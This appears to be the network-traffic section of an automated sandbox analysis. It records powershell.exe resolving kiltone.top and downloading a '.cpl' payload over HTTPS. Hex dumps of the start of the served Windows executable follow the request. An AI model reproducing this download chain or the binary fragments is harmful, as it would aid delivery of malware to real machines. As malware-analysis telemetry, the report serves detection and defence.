                                                                                                    Dec 15, 2024 09:27:37.518250942 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.518313885 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.518333912 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.518358946 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.518388987 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.518424034 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.540496111 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.540581942 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.540611982 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.540622950 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.540692091 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.540692091 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.552673101 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.552728891 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.552762985 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.552788019 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.552815914 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.552825928 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.562163115 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.562235117 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.562254906 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.562279940 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.562299967 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.562316895 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.570745945 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.570805073 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.570832014 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.570856094 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.570884943 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.570904970 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.577312946 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.577366114 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.577387094 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.577408075 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.577434063 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.577446938 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.584625959 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.584675074 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.584722996 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.584747076 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.584760904 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.584784985 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.591511965 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.591561079 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.591592073 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.591599941 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.591638088 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.683163881 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.686675072 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.686712027 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.686749935 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.686767101 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.686809063 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.686883926 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.729428053 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.729461908 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.729496002 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.729548931 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.729569912 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.729595900 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.734833956 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.734858990 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.734896898 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.734929085 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.734970093 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.734970093 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.741178036 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.741209030 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.741242886 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.741276026 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.741293907 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.741317987 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.746828079 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.746846914 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.746884108 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.746912003 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.746928930 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.746954918 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.753547907 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.753571987 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.753645897 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.753678083 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.753729105 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.759860992 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.759888887 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.759931087 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.759954929 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.759980917 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.760001898 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.791326046 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.791352987 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.791491032 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.791532993 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.791579962 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.843477964 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.899261951 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.899298906 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.899355888 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.899393082 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.899409056 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.899461031 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.921564102 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.921586037 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.921627998 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.921658993 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.921679974 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.921813011 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.926991940 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.927009106 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.927048922 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.927072048 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.927092075 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.927122116 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.933515072 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.933535099 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.933587074 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.933609962 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.933633089 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.933651924 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.939219952 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.939244986 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.939279079 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.939296007 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.939323902 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.939338923 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.945611000 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.945626974 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.945667982 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.945682049 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.945708990 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.945732117 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.952195883 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.952215910 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.952274084 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.952292919 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.954392910 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.983532906 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.983561039 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.983616114 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.983642101 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.983658075 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.987654924 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.052118063 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.091465950 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.091492891 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.091538906 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.091559887 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.091590881 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.091607094 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.113905907 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.113929987 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.114013910 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.114013910 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.114032984 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.114089966 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.118993044 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.119014978 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.119045019 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.119052887 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.119102955 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.125477076 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.125495911 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.125586033 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.125596046 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.125629902 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.131921053 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.131937027 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.132013083 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.132021904 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.132057905 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.137607098 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.137622118 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.137684107 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.137692928 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.137737036 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.144149065 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.144181967 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.144220114 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.144227982 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.144260883 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.144274950 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.175493956 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.175518036 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.175558090 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.175575972 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.175602913 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.175618887 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.199526072 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.283812046 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.283840895 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.283883095 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.283907890 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.283924103 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.283950090 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.306025982 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.306050062 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.306086063 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.306109905 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.306126118 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.306144953 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.311191082 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.311213970 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.311258078 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.311275959 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.311302900 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.311321020 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.317822933 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.317847967 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.317929029 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.317953110 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.318039894 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.324029922 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.324049950 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.324099064 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.324110985 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.324136019 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.324152946 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.330799103 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.330816031 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.330877066 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.330883980 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.331013918 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.335277081 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.336292028 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.336312056 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.336350918 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.336360931 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.336391926 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.336404085 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.367755890 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.367774963 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.367851973 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.367863894 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.369595051 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.406949997 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.476087093 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.476118088 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.476234913 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.476263046 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.478660107 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.498191118 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.498214960 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.498294115 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.498313904 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.498646021 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.498684883 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.498692036 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.498713970 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:38.498754025 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:38.508207083 CET49706443192.168.2.845.125.67.168
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 15, 2024 09:27:33.850239038 CET5071153192.168.2.81.1.1.1
                                                                                                    Dec 15, 2024 09:27:34.261967897 CET53507111.1.1.1192.168.2.8
                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                    Dec 15, 2024 09:28:26.850207090 CET192.168.2.81.1.1.14d5aEcho
                                                                                                    Dec 15, 2024 09:28:26.986779928 CET1.1.1.1192.168.2.8555aEcho Reply
                                                                                                    Dec 15, 2024 09:28:32.592679977 CET192.168.2.81.1.1.14d59Echo
                                                                                                    Dec 15, 2024 09:28:32.729163885 CET1.1.1.1192.168.2.85559Echo Reply
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Dec 15, 2024 09:27:33.850239038 CET192.168.2.81.1.1.10xf8e5Standard query (0)kiltone.topA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Dec 15, 2024 09:27:34.261967897 CET1.1.1.1192.168.2.80xf8e5No error (0)kiltone.top45.125.67.168A (IP address)IN (0x0001)false
                                                                                                    • kiltone.top
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.84970645.125.67.1684431548C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-15 08:27:35 UTC176OUTGET /stelin/Gosjeufon.cpl HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                    Host: kiltone.top
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-15 08:27:36 UTC253INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Sun, 15 Dec 2024 08:27:36 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 902856
                                                                                                    Last-Modified: Fri, 13 Dec 2024 23:58:00 GMT
                                                                                                    Connection: close
                                                                                                    ETag: "675cca08-dc6c8"
                                                                                                    Accept-Ranges: bytes
                                                                                                    2024-12-15 08:27:36 UTC16131INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 84 7b 68 8b c0 1a 06 d8 c0 1a 06 d8 c0 1a 06 d8 b3 78 05 d9 d2 1a 06 d8 b3 78 03 d9 72 1a 06 d8 b3 78 02 d9 d7 1a 06 d8 92 6f 02 d9 d1 1a 06 d8 92 6f 05 d9 d8 1a 06 d8 92 6f 03 d9 9f 1a 06 d8 0a 6f 03 d9 e9 1a 06 d8 b3 78 00 d9 c1 1a 06 d8 b3 78 07 d9 cf 1a 06 d8 c0 1a 07 d8 71 1a 06 d8 0a 6f 0f d9 c1 1a 06 d8 0a 6f f9 d8 c1 1a 06 d8 c0 1a 91 d8 c1 1a 06 d8 0a 6f 04 d9 c1 1a 06
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.${hxxrxooooxxqooo
                                                                                                    2024-12-15 08:27:36 UTC16384INData Raw: 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 04 00 00 00 e8 d0 17 01 00 c7 06 4c bc 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 dd 33 48 00 64 a1 00 00 00 00 50 51 56 a1 34 61 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 00 00 00 00 e8 60 17 01 00 c7 06 b4 b3 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 dd 33 48 00 64 a1 00 00 00 00 50 51 56 a1 34 61 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c b3 48 00 c7 46 0c 02 00 00 00 e8 f0 16 01 00 c7 06
                                                                                                    Data Ascii: ENHFLHMdY^]Ujh3HdPQV4aK3PEduWfFuENHF`HMdY^]Ujh3HdPQV4aK3PEduWfFuENHF
                                                                                                    2024-12-15 08:27:37 UTC16384INData Raw: 45 fc 02 00 00 00 50 8b cf e8 ef 02 00 00 8d 77 18 50 8b ce e8 14 d7 00 00 8b 95 a4 fe ff ff 83 fa 10 72 2f 8b 8d 90 fe ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 9a 02 00 00 52 51 e8 68 4e 05 00 83 c4 08 83 7e 14 10 72 02 8b 36 ff 77 28 8b 85 00 ff ff ff 8d 8d 00 ff ff ff 56 ff 50 10 8d 45 cc 50 8b 85 00 ff ff ff 8d 8d 00 ff ff ff ff 50 18 6a 4c 8d 85 b0 fe ff ff 6a 00 50 e8 ec 6b 05 00 83 c4 0c c7 85 90 fe ff ff 00 00 00 00 8d 8d 90 fe ff ff c7 85 a0 fe ff ff 00 00 00 00 c7 85 a4 fe ff ff 0f 00 00 00 c6 85 90 fe ff ff 00 6a 00 68 5b 38 4a 00 e8 b2 fb 00 00 c6 45 fc 03 8d 8d 74 fe ff ff 6a 01 c7 85 74 fe ff ff 00 00 00 00 68 bc 3d 4a 00 c7 85 84 fe ff ff 00 00 00 00 c7 85 88 fe ff ff 0f 00 00 00 c6 85 74 fe ff
                                                                                                    Data Ascii: EPwPr/BrI#+RQhN~r6w(VPEPPjLjPkjh[8JEtjth=Jt
